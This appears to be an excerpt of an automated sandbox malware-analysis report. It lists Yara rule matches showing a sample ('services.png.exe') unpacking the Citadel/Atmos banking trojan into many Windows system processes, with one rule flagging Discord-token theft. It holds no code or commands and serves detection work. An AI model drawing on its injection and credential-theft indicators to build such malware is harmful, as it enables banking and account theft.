Source: Yara match	File source: 0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: services.png.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XRdxSzSUL8yOL.exe PID: 5012, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: services.png.exe, type: SAMPLE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: dump.pcap, type: PCAP	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0.0.services.png.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 1.0.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 1.3.nyheukpo.exe.20f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
